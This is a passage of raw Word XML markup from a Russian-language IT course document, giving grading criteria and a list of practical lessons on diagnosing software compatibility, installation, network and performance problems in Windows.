        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оценка </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>хорошо</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выставляется, если правильно выполнено 80-94% объема работы. Возможные недочеты и ошибки: нерациональное решение, выполнение задания с задержкой времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оценка </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>удовлетворительно</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выставляется, если правильно выполнено 70-79% объема работы. Возможные ошибки: выполнение задания с помощью преподавателя, невыполненное задание, несоответствие выполненного задания требованиям преподавателя, выполнение задания с задержкой времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оценка </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>неудовлетворительно</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выставляется, если выполнено менее 70% работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00607C3B" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD2C0E" w:rsidRPr="00617AC0" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="110"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc26278719"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ТЕМАТИЧЕСКИЙ ПЛАН ПРАКТИЧЕСКИХ ЗАНЯТИЙ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="4919" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8845"/>
        <w:gridCol w:w="849"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD2C0E" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00AD2C0E" w:rsidRPr="00617AC0" w:rsidRDefault="00AD2C0E" w:rsidP="00621B4E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наименование разде</w:t>
            </w:r>
            <w:r w:rsidR="00621B4E" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>л</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>а, темы занятия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AD2C0E" w:rsidRPr="00617AC0" w:rsidRDefault="00AD2C0E" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Кол-во часов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00BC3B4C">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Раздел 1. Выявление и разрешение проблем совместимости программного обеспечения отраслевой направленности (ПК 3.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00582154" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="001E528A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Выявление проблем совместимости программного обеспечения системными средствами</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ОС</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">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494A75">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00B65F91">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Выбор методов выявления и устранения проблем совместимости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494A75">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00B65F91">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Решение проблем совместимости отраслевого ПО с помощью технологии создания виртуальной машины</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BE698B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00C16B26">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 4</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Выявление и устранение проблем установки ПО обработки офисных документов, графики, видео, звука.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BE698B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00C16B26">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 5</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Решение проблем сбоя установки ОС</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">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BE698B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00C16B26">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 6 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Решение проблем сбоя отраслевого программного обеспечения (ПО)</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4B40E3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00FD1D40">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 7</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Решение проблем сбоя при установке программного обеспечения, написанного для более ранних версий ОС Windows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49255D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00F3081C">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 8</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Выявление и решение проблем аппаратного сбоя средствами ОС Windows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8F35D3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00213934">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 9</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Выявление и решение проблем входа в систему при использовании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8F35D3">
        <w:trPr>
          <w:trHeight w:val="307"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00213934">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 10</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Выявление и устранение проблем сетевых подключений</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5A00A8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00FA3A7D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 11</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Выявление и решение проблем при обновлении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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00E60353">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="008D71D4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 12 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Мониторинг производительности ОС с </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>помощью программы «Производительность».</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E60353">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="008D71D4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 13</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Решение проблем производительности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E60353">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="008D71D4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 14</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Тестирование производительности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E60353">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="008D71D4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 15</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Оптимизация производительности операционной системы (ОС) и программного обеспечения (ПО)</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D967C8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="004125F6">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Раздел 2. Обслуживание, тестирование и настройка программного обеспечения отраслевой направленности</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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="007813EC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00377A39">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 16</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Инсталляция, настройка и обновление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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00621B4E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 17 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Мониторинг текущих характеристик отраслевого программного обеспечения</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00582154" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
